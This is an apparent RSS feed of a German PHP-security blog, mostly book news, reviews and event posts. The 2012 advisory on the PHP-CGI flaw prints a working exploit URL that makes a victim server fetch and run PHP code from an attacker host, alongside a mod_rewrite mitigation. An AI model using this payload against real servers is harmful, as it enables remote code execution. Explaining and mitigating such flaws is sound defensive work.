<?xml version="1.0" encoding="utf-8" ?>

<rss version="2.0" 
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:admin="http://webns.net/mvcb/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   >
<channel>
    <title>PHP-Sicherheit</title>
    <link>http://www.php-sicherheit.de/</link>
    <description>Errata, Advisories, Tips und Howtos zu PHP-Sicherheit</description>
    <dc:language>en</dc:language>
    <generator>Serendipity 1.5.5 - http://www.s9y.org/</generator>
    
    

<item>
    <title>Neue PHP-Lücke bedroht CGI-Installationen</title>
    <link>http://www.php-sicherheit.de/archives/34-Neue-PHP-Luecke-bedroht-CGI-Installationen.html</link>
            <category>Advisories</category>
    
    <comments>http://www.php-sicherheit.de/archives/34-Neue-PHP-Luecke-bedroht-CGI-Installationen.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=34</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=34</wfw:commentRss>
    

    <author>nospam@example.com (Christopher Kunz)</author>
    <content:encoded>
    &lt;p&gt;Eine neue Lücke, die letzte Woche zufällig (lies: unabsichtlich) veröffentlicht wurde, hält derzeit die PHP-Entwickler in Atem. Der Fehler, der seit mindestens 2004 existiert, ist auf eine fehlerhafte Implementierung der CGI-Spezifikation zurückzuführen. &lt;/p&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;p&gt;Diese besagt, daß ein Query-String, der mit &quot;-&quot; beginnt kein &quot;=&quot; enthält, als Kommandozeilenargument an das ausführende CGI-Programm (hier also PHP) übergeben werden kann. Das führt in Verbindung mit unsicheren Wrapperskripten dazu, daß der Zugriff auf eine beliebige - auch leere - PHP-Datei beliebige Codeausführung ermöglicht. Beispiel (Achtung, dies ist ein Remote-Code-Exploit, nicht auf Produktionswebservern ausprobieren):&lt;br /&gt;
&lt;tt&gt;http://opferserver/irgendein.php?-n%20-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://boeserserver/php-datei.txt&lt;/tt&gt;&lt;br /&gt;
Aufgeschlüsselt bedeutet dies: &lt;br /&gt;
&lt;ul&gt;&lt;br /&gt;
&lt;li&gt;&lt;tt&gt;-n&lt;/tt&gt;: Ignoriere vorhandene php.ini-Dateien und setze somit Suhosin, open_basedir, allow_url_include und &lt;i&gt;alle&lt;/i&gt; anderen Sicherheitseinstellungen außer Kraft&lt;br /&gt;
&lt;li&gt;&lt;tt&gt;-d allow_url_include=On&lt;/tt&gt;: Setze &quot;allow_url_include&quot; vom Default (off) auf On und erlaube die Ausführung von PHP-Code aus URLs.&lt;br /&gt;
&lt;li&gt;&lt;tt&gt;-d auto_prepend_file=http://boeserserver/php-datei.txt&lt;/tt&gt;: Füge die PHP-Datei &quot;http://boeserserver/php-datei.txt&quot; vor jeder Skriptausführung ein und führe sie aus.&lt;br /&gt;
&lt;/ul&gt;&lt;br /&gt;
Es gibt noch lustige andere PHP-CGI-Optionen - ein Blick in &lt;tt&gt;php-cgi -h&lt;/tt&gt; ist durchaus aufschlußreich.&lt;/p&gt;&lt;br /&gt;
&lt;p&gt;Innerhalb kürzester Zeit gab es für die Lücke ein Metasploit-Modul und diverse Exploits auf den üblichen Exploit-Webseiten. Eine Knowledge-Datenbank von Sony zeigte fröhlich ihren Quellcode her und Facebook reagierte mit einer &lt;a href=&quot;http://facebook.com/?-s&quot; rel=&quot;external nofollow&quot;&gt;lustigen Stellenanzeige&lt;/a&gt;.&lt;/p&gt;&lt;br /&gt;
In ihrem Update auf PHP 5.4.2 und 5.3.12 haben die Entwickler gleich zwei Fehler gemacht: So wurde übersehen, daß führender Whitespace im Query String für die Ausführung bei bestimmten, besonders unsicheren Wrapperscripts keine Auswirkung hat - und URL-kodierte Gleichheitszeichen wurden ignoriert. Zur Stunde gibt es noch keine neue PHP-Version, sie dürfte aber nicht mehr lange auf sich warten lassen. Ein initial von der PHP Group vorgeschlagener Bugfix per mod_rewrite-Regel war ebenfalls fehlerhaft, aktuell wird die (nach Meinung des Autors dieser Zeilen korrekte) folgende Regel empfohlen:&lt;br /&gt;
&lt;pre&gt;&lt;br /&gt;
    RewriteCond %{QUERY_STRING} ^[^=]*$&lt;br /&gt;
    RewriteCond %{QUERY_STRING} %2d|\- [NC]&lt;br /&gt;
    RewriteRule .? - [F,L]&lt;br /&gt;
&lt;/pre&gt;&lt;br /&gt;
Mehr Informationen finden sich im englischen Schwesterblog dieses Blogs:&lt;br /&gt;
&lt;ul&gt;&lt;br /&gt;
&lt;li&gt;&lt;a href=&quot;http://www.php-security.net/archives/9-New-PHP-CGI-exploit-CVE-2012-1823,-PoC-exploit.html&quot;&gt;http://www.php-security.net/archives/9-New-PHP-CGI-exploit-CVE-2012-1823,-PoC-exploit.html&lt;/a&gt;&lt;br /&gt;
&lt;li&gt;&lt;a href=&quot;http://www.php-security.net/archives/11-Mitigation-for-CVE-2012-1823-CVE-2012-2311.html&quot;&gt;http://www.php-security.net/archives/11-Mitigation-for-CVE-2012-1823-CVE-2012-2311.html&lt;/a&gt; 
    </content:encoded>

    <pubDate>Tue, 08 May 2012 09:53:46 +0200</pubDate>
    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/34-guid.html</guid>
    
</item>
<item>
    <title>PHP 5.4.0 ist da - was sind die Änderungen?</title>
    <link>http://www.php-sicherheit.de/archives/33-PHP-5.4.0-ist-da-was-sind-die-AEnderungen.html</link>
            <category>Artikel</category>
    
    <comments>http://www.php-sicherheit.de/archives/33-PHP-5.4.0-ist-da-was-sind-die-AEnderungen.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=33</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=33</wfw:commentRss>
    

    <author>nospam@example.com (Christopher Kunz)</author>
    <content:encoded>
    Nach langer Zeit (fast anderthalb Jahre!) wird hier endlich mal wieder etwas entstaubt. Viel hat sich in den letzten Jahren getan - persönlich bei den Autoren des Buches, aber auch in der PHP-Szene. Vieles ist jedoch auch gleich geblieben... &lt;br /&gt;
Wir starten dieses Blog neu mit einer kleinen Übersicht der sicherheitsrelevanten Änderungen in PHP 5.4.0 - sowohl im Sprachkern als auch in den wichtigsten Sicherheits-Erweiterungen. &lt;br /&gt;
&lt;h4&gt;register_globals ist weg&lt;/h4&gt;&lt;br /&gt;
Die Götter haben ein Einsehen: Nachdem die berühmt-berüchtigte Konfigurationsdirektive &quot;register_globals&quot; seit PHP 5.0 auf &quot;off&quot; stand und als deprecated - also überflüssig und abgekündigt - markiert war, ist sie nun aus PHP komplett verschwunden. Es gibt also keine per Konfiguration aktivierbare Möglichkeit mehr, Requestvariablen statt über $_{GET,POST,REQUEST} direkt mit $variable anzusprechen.&lt;br /&gt;
Diese Änderung dürfte gleichzeitig das Hauptproblem für Upgrades bedeuten. Wenn Ihre Skripte noch auf &quot;register_globals on&quot; angewiesen sind, &lt;u&gt;upgraden Sie PHP nicht&lt;/u&gt;! Sie sollten dringend Ihre Skripte anpassen - Zeit genug hatten Sie.&lt;br /&gt;
&lt;h4&gt;Safe Mode ist weg&lt;/h4&gt;&lt;br /&gt;
Den ungeliebten Safe Mode hat es auch dahingerafft. Er ist mit PHP 5.4 komplett verschwunden. &lt;br /&gt;
&lt;h4&gt;Magic  quotes&lt;/h4&gt;&lt;br /&gt;
Die Ini-Optionen &quot;magic_quotes_gpc&quot; und Konsorten sind ebenfalls verschwunden. Skriptautoren sollten sich nun nicht mehr darauf verlassen, daß automatisch quotiert wird - und ggf. mit den geeigneten Funktionen selber Quotes nachziehen.&lt;br /&gt;
&lt;h4&gt;Suhosin-Patch und Suhosin Extension&lt;/h4&gt;&lt;br /&gt;
Weder Suhosin-Patch noch Suhosin-Extension existieren für PHP 5.4.0. Derzeit ist auch nicht bekannt, ob und wann sie veröffentlicht werden. Einige Paketmaintainer - unter anderem Debian - haben daher ihre Unterstützung für Suhosin in PHP zunächst eingestellt und verweisen auf spezielle Pakete oder die Möglichkeit, Suhosin von Hand einzukompilieren.&lt;br /&gt;
Derzeit läßt sich die Suhosin-Extension nicht mit PHP 5.4.0 übersetzen.  
    </content:encoded>

    <pubDate>Mon, 02 Apr 2012 16:04:13 +0200</pubDate>
    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/33-guid.html</guid>
    
</item>
<item>
    <title>Exploit-Kit mit Fake-Adminkonsole</title>
    <link>http://www.php-sicherheit.de/archives/32-Exploit-Kit-mit-Fake-Adminkonsole.html</link>
    
    <comments>http://www.php-sicherheit.de/archives/32-Exploit-Kit-mit-Fake-Adminkonsole.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=32</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=32</wfw:commentRss>
    

    <author>nospam@example.com (Christopher Kunz)</author>
    <content:encoded>
    Das &quot;EFTPS&quot;-Exploit-Toolkit hat laut &lt;a href=&quot;http://blog.tllod.com/2010/11/03/statistics-dont-lie-or-do-they/&quot;&gt;diesem Blogbericht&lt;/a&gt; eine zusätzliche, komplett gefälschte Adminkonsole, die über leicht ratbare Paßworte (&quot;admin&quot;/&quot;admin&quot; etc.) &quot;gehackt&quot; werden kann und dann einige falsche Statistiken anzeigt. Diese Konsole loggt aber IP und sonstige Vitaldaten jedes Besuchers für die spätere Verwendung.&lt;br /&gt;
&lt;br /&gt;
Die Idee ist drollig - insbesondere, wenn das ganze Schule macht, können sich Administratoren, die ein Exploit-Toolkit auf einem Server finden, bei der Analyse auf ein ganzes Stück Mehrarbeit einstellen... 
    </content:encoded>

    <pubDate>Wed, 03 Nov 2010 09:54:22 +0100</pubDate>
    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/32-guid.html</guid>
    
</item>
<item>
    <title>Neuer &quot;Month of PHP Security&quot;</title>
    <link>http://www.php-sicherheit.de/archives/31-Neuer-Month-of-PHP-Security.html</link>
            <category>Events</category>
    
    <comments>http://www.php-sicherheit.de/archives/31-Neuer-Month-of-PHP-Security.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=31</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=31</wfw:commentRss>
    

    <author>nospam@example.com (Administrator)</author>
    <content:encoded>
    Mein Co-Autor Stefan Esser richtet zusammen mit SyScan und seiner Firma SektionEins einen neuen &quot;Month of PHP Security&quot; aus. &lt;br /&gt;
&lt;br /&gt;
Der ganze &lt;strong&gt;Mai 2010&lt;/strong&gt; wird im Zeichen der PHP-Sicherheit stehen.&lt;br /&gt;
&lt;br /&gt;
Anders als beim erstmaligen Sicherheitsmonat, in dem Stefan (soweit ich  mich erinnere) alle Sicherheitslücken und Advisories selber erarbeitet hat, ist nun die Mithilfe der Community gefragt.&lt;br /&gt;
&lt;br /&gt;
In einem CfP auf php-security.org ruft Stefan zu folgenden Beiträgen auf: &lt;br /&gt;
&lt;ul&gt;&lt;br /&gt;
&lt;li&gt;Neue Lücke in PHP selber, inkl. Lösungsvorschlag an die Entwickler &lt;br /&gt;
&lt;li&gt;Neue Lücke in beliebter PHP-Extension etc. (also z.B. in eAccelerator, APC oder Suhosin &lt;img src=&quot;http://www.php-sicherheit.de/templates/default/img/emoticons/wink.png&quot; alt=&quot;;-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt; )&lt;br /&gt;
&lt;li&gt;Detaillierter Artikel zu einem Aspekt von PHP-Sicherheit&lt;br /&gt;
&lt;li&gt;&quot;Komplizierter&quot; Exploit gegen eine bekannte PHP-Anwendung&lt;br /&gt;
&lt;li&gt;&quot;Komplizierter&quot; theoretischer Artikel über Angriffe gegen PHP (Beispiel: wie erzeugt man Heap Overflows)&lt;br /&gt;
&lt;li&gt;Anleitung zum Angriff gegen verschlüsselte PHP-Anwendungen&lt;br /&gt;
&lt;li&gt;Veröffentlichung eines neuen PHP Security Werkzeugs&lt;br /&gt;
&lt;li&gt;Oder irgendwas anderes, was mit PHP Security zu tun hat&lt;br /&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;br /&gt;
Am Ende des PHP-Security-Monats gibt&#039;s Preise für die besten Einsendungen, darunter Tickets für die Syscan 2010 (ohne Hotel- und Reisekosten), Lizenzen für CodeScan PHP und Amazon-Gutscheine. &lt;br /&gt;
&lt;br /&gt;
Mehr Informationen gibt es unter &lt;a rel=&quot;nofollow&quot; href=&quot;http://www.php-security.org/&quot;&gt;http://www.php-security.org/&lt;/a&gt; .&lt;br /&gt;
 
    </content:encoded>

    <pubDate>Sat, 27 Feb 2010 19:35:04 +0100</pubDate>
    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/31-guid.html</guid>
    
</item>
<item>
    <title>Rezension im Linux-Magazin 09/08</title>
    <link>http://www.php-sicherheit.de/archives/30-Rezension-im-Linux-Magazin-0908.html</link>
            <category>Reviews</category>
    
    <comments>http://www.php-sicherheit.de/archives/30-Rezension-im-Linux-Magazin-0908.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=30</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=30</wfw:commentRss>
    

    <author>nospam@example.com (Christopher Kunz)</author>
    <content:encoded>
    Das Linux-Magazin rezensiert in seiner vorigen Ausgabe (September 2008) die 3. Auflage des Buches &quot;PHP-Sicherheit&quot;. Fazit: &lt;blockquote&gt;Schön, daß dieses lehrreiche und notwendige Buch nach der vergriffenen zweiten Auflage wieder erhältlich ist - wenn auch mit wenig Neuem.&lt;/blockquote&gt;&lt;br /&gt;
Recht haben sie, die Kollegen - denn die dritte Auflage war von vorneherein nur als &quot;Bugfix Release&quot; gedacht. Anders als in der Softwarebranche sind Versionsnummern à la &quot;2.1&quot; aber bei Druckerzeugnissen eher nicht üblich. &lt;img src=&quot;http://www.php-sicherheit.de/templates/default/img/emoticons/wink.png&quot; alt=&quot;;-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt; 
    </content:encoded>

    <pubDate>Fri, 12 Sep 2008 09:37:39 +0200</pubDate>
    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/30-guid.html</guid>
    
</item>
<item>
    <title>Buchvorstellung in der Online-Ausgabe der &quot;PC Welt&quot;</title>
    <link>http://www.php-sicherheit.de/archives/29-Buchvorstellung-in-der-Online-Ausgabe-der-PC-Welt.html</link>
            <category>Reviews</category>
    
    <comments>http://www.php-sicherheit.de/archives/29-Buchvorstellung-in-der-Online-Ausgabe-der-PC-Welt.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=29</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=29</wfw:commentRss>
    

    <author>nospam@example.com (Christopher Kunz)</author>
    <content:encoded>
    Die Zeitschrift &quot;PC Welt&quot; widmet der dritten Auflage von &quot;PHP-Sicherheit&quot; eine ausführliche Besprechung. &lt;br /&gt;
So heißt es dort:&lt;br /&gt;
&lt;blockquote&gt;Das macht die Lektüre spezieller Fachliteratur zur Pflichtaufgabe jedes Programmierers und Server- beziehungsweise Datenbankadministrators. Das Buch &quot;PHP-Sicherheit&quot; aus dem dpunkt-Verlag ist so eine Pflichtlektüre und eine sehr gute obendrein.&lt;/blockquote&gt;&lt;br /&gt;
Fazit der Rezension: &lt;br /&gt;
&lt;blockquote&gt;Mit einem Buch hat man alle derzeit denkbaren Angriffsstechniken und -Szenarien und -Schwachstellenbeschreibung zur Hand - das ist die Stärke dieses spezialisierten Werkes, dessen Preis von 36 Euro wirklich gut angelegt ist.&lt;/blockquote&gt;&lt;br /&gt;
&lt;br /&gt;
Die vollständige Besprechung finden Sie hier: &lt;a href=&quot;http://www.pcwelt.de/start/sicherheit/sonstiges/news/171645/php_sicherheit_fuer_programmierer_und_admins/index.html&quot;&gt;Besprechung &quot;PHP-Sicherheit&quot; in PC-Welt&lt;/a&gt;. 
    </content:encoded>

    <pubDate>Fri, 12 Sep 2008 08:50:05 +0200</pubDate>
    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/29-guid.html</guid>
    
</item>
<item>
    <title>Schulung &quot;PHP-Sicherheit&quot; mit Peter Prochaska</title>
    <link>http://www.php-sicherheit.de/archives/28-Schulung-PHP-Sicherheit-mit-Peter-Prochaska.html</link>
            <category>Events</category>
    
    <comments>http://www.php-sicherheit.de/archives/28-Schulung-PHP-Sicherheit-mit-Peter-Prochaska.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=28</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=28</wfw:commentRss>
    

    <author>nospam@example.com (Christopher Kunz)</author>
    <content:encoded>
    Unser Ko-Autor Peter Prochaska veranstaltet wieder eine Schulung im Linuxhotel:&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;Vom 22.09.08 bis 24.09.08 findet im Linuxhotel in Essen-Horst eine PHP-Sicherheitsschulung mit mir statt. Es sind noch wenige Plätze frei. Ich würde mich freuen, ein paar von euch mal persönlich kennenzulernen.&lt;/blockquote&gt;&lt;br /&gt;
&lt;br /&gt;
Die Kursbeschreibung findet Ihr unter: &lt;a href=&quot;http://www.linuxhotel.de/kurs/php_sicherheit/index.html&quot;&gt;Kursbeschreibung &quot;PHP-Sicherheit&quot;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Hier der Link zur Anmeldung: &lt;a href=&quot;http://www.linuxhotel.de/cgi-bin/anmeldung_kurs.pl?veranstaltung=PHP_Sicherheit&amp;amp;termin=22.09.-24.09.08&quot;&gt;Anmeldung PHP-Sicherheitskurs&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
In den vergangenen Jahren war das Buch &quot;PHP-Sicherheit&quot; stets kursbegleitende Lektüre.&lt;br /&gt;
&lt;br /&gt;
Ich (Christopher) habe in der Vergangenheit mit Peter zusammen diese Schulungen im Linuxhotel gehalten und kann die Location nur empfehlen - den Referenten sowieso. Es wird für den Preis eine sehr intensive Lernatmosphäre geboten und die Verpflegung &amp;amp; Infrastruktur ist auch vom Feinsten. Leider kann ich ja nicht mehr dabei sein (aus beruflichen Gründen), wünsche Peter und allen Teilnehmern jedoch viel Spaß und maximalen Lernerfolg! 
    </content:encoded>

    <pubDate>Thu, 11 Sep 2008 16:37:47 +0200</pubDate>
    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/28-guid.html</guid>
    
</item>
<item>
    <title>Neue Rezension zur dritten Auflage</title>
    <link>http://www.php-sicherheit.de/archives/27-Neue-Rezension-zur-dritten-Auflage.html</link>
            <category>Reviews</category>
    
    <comments>http://www.php-sicherheit.de/archives/27-Neue-Rezension-zur-dritten-Auflage.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=27</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=27</wfw:commentRss>
    

    <author>nospam@example.com (Christopher Kunz)</author>
    <content:encoded>
    Von Garvin Hicking, Autor des offiziellen Handbuches zu Serendipity, dem Weblog-System, das auch für diese Website verwendet wird, kommt eine erste Rezension zur dritten Auflage:&lt;br /&gt;
&lt;blockquote&gt;Die dritte Auflage des Buches &quot;PHP-Sicherheit&quot; trägt nach wie vor zu Recht einen schlagkräftigen Namen. Allein das Inhaltsverzeichnis liest sich wie eine Offenbarung aller Schlüsselwörter, die man im Zusammenhang mit &quot;Security&quot; jemals gehört haben sollte.&lt;br /&gt;
Wäre sich jeder Web-Entwickler der angesprochenen (Un)Sicherheitsmethoden bewusst, die das Buch einsteigerfreundlich von Grund auf erklärt, würde es vermutlich keine Anwendungen mit Hack-Ansätzen mehr geben.&lt;br /&gt;
[..]&lt;br /&gt;
Zu kaum einem anderen Web-Thema kann man ein Buch so nachdrücklich empfehlen und als Pflichtlektüre ans Herz legen.&lt;/blockquote&gt;&lt;br /&gt;
Mehr können Sie auf Garvins Blog lesen: &lt;a href=&quot;http://garv.in/serendipity/archives/1271-PHP-Sicherheit.html&quot;&gt;Rezension zu PHP-Sicherheit, 3. Auflage&lt;/a&gt; 
    </content:encoded>

    <pubDate>Fri, 04 Jul 2008 11:26:01 +0200</pubDate>
    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/27-guid.html</guid>
    
</item>
<item>
    <title>Neuer Artikel online: PKI Login with PHP</title>
    <link>http://www.php-sicherheit.de/archives/26-Neuer-Artikel-online-PKI-Login-with-PHP.html</link>
            <category>Artikel</category>
    
    <comments>http://www.php-sicherheit.de/archives/26-Neuer-Artikel-online-PKI-Login-with-PHP.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=26</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=26</wfw:commentRss>
    

    <author>nospam@example.com (Christopher Kunz)</author>
    <content:encoded>
    Mit dem Thema &amp;quot;Authentifizierung per X.509-Zertifikat und PHP&amp;quot; beschäftigt sich ein kurzer englischer Artikel von mir auf dem &amp;quot;Schwesterblog&amp;quot; php-security.net. Er trägt den Titel &amp;quot;&lt;a href=&quot;http://www.php-security.net/archives/3-X.509-PKI-login-with-PHP-and-Apache.html&quot;&gt;X.509 PKI login with PHP and Apache&lt;/a&gt;&amp;quot; und ist für den Einen oder Anderen vielleicht interessant. Anders als der sehr allgemein gehaltene SSL-Artikel im Buch &amp;quot;Sichere Webanwendungen mit PHP&amp;quot; versuche ich auch zu beschreiben, warum X.509-Zertifikate gute Authentifizierungstokens sind (sie sind nämlich vertrauenswürdig!) und wie man sie ganz konkret in die eigene bestehende Anwendung einbindet.&lt;br /&gt;
 
    </content:encoded>

    <pubDate>Fri, 30 May 2008 15:42:37 +0200</pubDate>
    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/26-guid.html</guid>
    
</item>
<item>
    <title>Zweite Auflage ausverkauft, dritte Auflage unterwegs</title>
    <link>http://www.php-sicherheit.de/archives/25-Zweite-Auflage-ausverkauft,-dritte-Auflage-unterwegs.html</link>
    
    <comments>http://www.php-sicherheit.de/archives/25-Zweite-Auflage-ausverkauft,-dritte-Auflage-unterwegs.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=25</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=25</wfw:commentRss>
    

    <author>nospam@example.com (Christopher Kunz)</author>
    <content:encoded>
    &lt;p&gt;&lt;div style=&quot;width: 76px;&quot; class=&quot;serendipity_imageComment_left&quot;&gt;&lt;div class=&quot;serendipity_imageComment_img&quot;&gt;&lt;a href=&quot;http://www.php-sicherheit.de/uploads/cover-php-sicherheit-auflage-3.jpg&quot; class=&quot;serendipity_image_link&quot;&gt;&lt;!-- s9ymdb:11 --&gt;&lt;img width=&quot;76&quot; height=&quot;110&quot; src=&quot;http://www.php-sicherheit.de/uploads/cover-php-sicherheit-auflage-3.serendipityThumb.jpg&quot; class=&quot;serendipity_image_left&quot; alt=&quot;&quot;  /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;serendipity_imageComment_txt&quot;&gt;Coverillustration PHP-Sicherheit Auflage 3&lt;/div&gt;&lt;/div&gt;Die zweite Auflage unseres Buches ist nun bei allen großen Online-Buchhändlern ausverkauft und vermutlich nur noch gebraucht oder antiquarisch zu bekommen. Höchste Zeit, die dritte Auflage fertig zu bekommen - und seit gestern haben wir nun auch eine Coverillustration. Wie bei den zwei vorherigen Auflagen ist die Basisillustration dieselbe geblieben - die Farbe hat sich jedoch noch einmal geändert und ist einem Signalrot, das meiner Meinung nach gut zur Thematik paßt, gewichen.&lt;/p&gt;&lt;p&gt;Die dritte Auflage wird mit einigen Überarbeitungen und etwas neuem Inhalt im Juni erscheinen. Wer das Buch noch nicht hat, sollte spätestens dann zugreifen! &lt;img src=&quot;http://www.php-sicherheit.de/templates/default/img/emoticons/smile.png&quot; alt=&quot;:-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt;&lt;/p&gt;&lt;br /&gt;
&lt;br clear=&quot;all&quot; /&gt; 
    </content:encoded>

    <pubDate>Tue, 20 May 2008 09:16:52 +0200</pubDate>
    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/25-guid.html</guid>
    
</item>
<item>
    <title>PHP-Sicherheit</title>
    <link>http://www.php-sicherheit.de/archives/23-PHP-Sicherheit.html</link>
            <category>Buch</category>
    
    <comments>http://www.php-sicherheit.de/archives/23-PHP-Sicherheit.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=23</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=23</wfw:commentRss>
    

    <author>nospam@example.com (Christopher Kunz)</author>
    <content:encoded>
    &lt;font color=&quot;red&quot;&gt;&lt;h2&gt;Dritte überarbeitete Auflage jetzt im Buchhandel erhältlich&lt;/h2&gt;&lt;/font&gt;&lt;br /&gt;
&lt;p&gt;&lt;font face=&quot;impact&quot;&gt;&lt;span style=&quot;text-transform: uppercase;&quot;&gt; Christopher Kunz /  Stefan Esser /  Peter Prochaska&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;
&lt;div class=&quot;emtit&quot;&gt;&lt;h1&gt;PHP-Sicherheit&lt;/h1&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;emsubtit&quot;&gt;&lt;h3&gt;PHP/MySQL-Webanwendungen sicher programmieren&lt;/h3&gt;&lt;/div&gt;PHP gilt mittlerweile als die beliebteste Skriptsprache für&lt;br /&gt;
Webanwendungen. Leider werden Sicherheitsaspekte bei der&lt;br /&gt;
PHP-Entwicklung oft vernachlässigt. Dies führt leicht zu massiven&lt;br /&gt;
Sicherheitsproblemen und ist dann für kompromittierte Server und&lt;br /&gt;
verunstaltete Webseiten verantwortlich. Wie man solche Risiken erkennen&lt;br /&gt;
und abwehren kann, zeigt dieses Buch.&lt;br /&gt;
&lt;br /&gt;&lt;p&gt;&lt;br /&gt;
An nachvollziehbaren Beispielen lernen die Leser alle wichtigen Gefahren kennen, u.a.:&lt;br /&gt;
&lt;/p&gt;&lt;ul&gt;&lt;li&gt;SQL-Injection&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;Cross-Site Scripting&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;Angriffe gegen Sessions&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;Angriffe auf Upload-Formulare&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;Cross-Site Request Forgery&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;HTTP Response Splitting&lt;br /&gt;
&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;br /&gt;
Darauf aufbauend vermitteln die Autoren effiziente Vorbeugungs- und Gegenmaßnahmen, z.B.:&lt;br /&gt;
&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Sichere Konfiguration von PHP&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;Filterung mit mod_security&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;Richtige Überprüfung von Variablen&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;Blacklist-/Whitelist-Prüfungen&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;Prepared Statements und Stored Procedures&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;Captchas&lt;br /&gt;
&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;br /&gt;
Die Leser lernen, welche Fehler sie bei der Umsetzung ihrer Ideen&lt;br /&gt;
in PHP vermeiden sollten. Außerdem können sie anhand der im Buch&lt;br /&gt;
genannten &amp;quot;Best Practices&amp;quot; ihren eigenen Programmierstil kritisch&lt;br /&gt;
überprüfen und schnell in die Fehlersuche einsteigen. Die Checkliste im&lt;br /&gt;
Anhang bietet eine Anleitung für Code Audits und für die Absicherung&lt;br /&gt;
von Projekten.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;Die zweite Auflage wurde gründlich überarbeitet, aktualisiert und&lt;br /&gt;
an aktuelle Neuerungen wie PHP 5.2.0 angepasst. In einem zusätzlichen&lt;br /&gt;
Kapitel stellen die Autoren die neue PHP-Erweiterung zur Filterung von&lt;br /&gt;
Eingabedaten vor.&lt;br /&gt;
&lt;/p&gt;&lt;h3&gt;&lt;strong&gt;Zielgruppe:&lt;/strong&gt;&lt;/h3&gt;&lt;br /&gt;
    &lt;ul&gt;&lt;li&gt;PHP-Entwickler&lt;/li&gt;&lt;li&gt; Administratoren von Hosting-/Anwendungsservern&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;
 
    </content:encoded>

    <pubDate>Tue, 08 Apr 2008 09:53:47 +0200</pubDate>
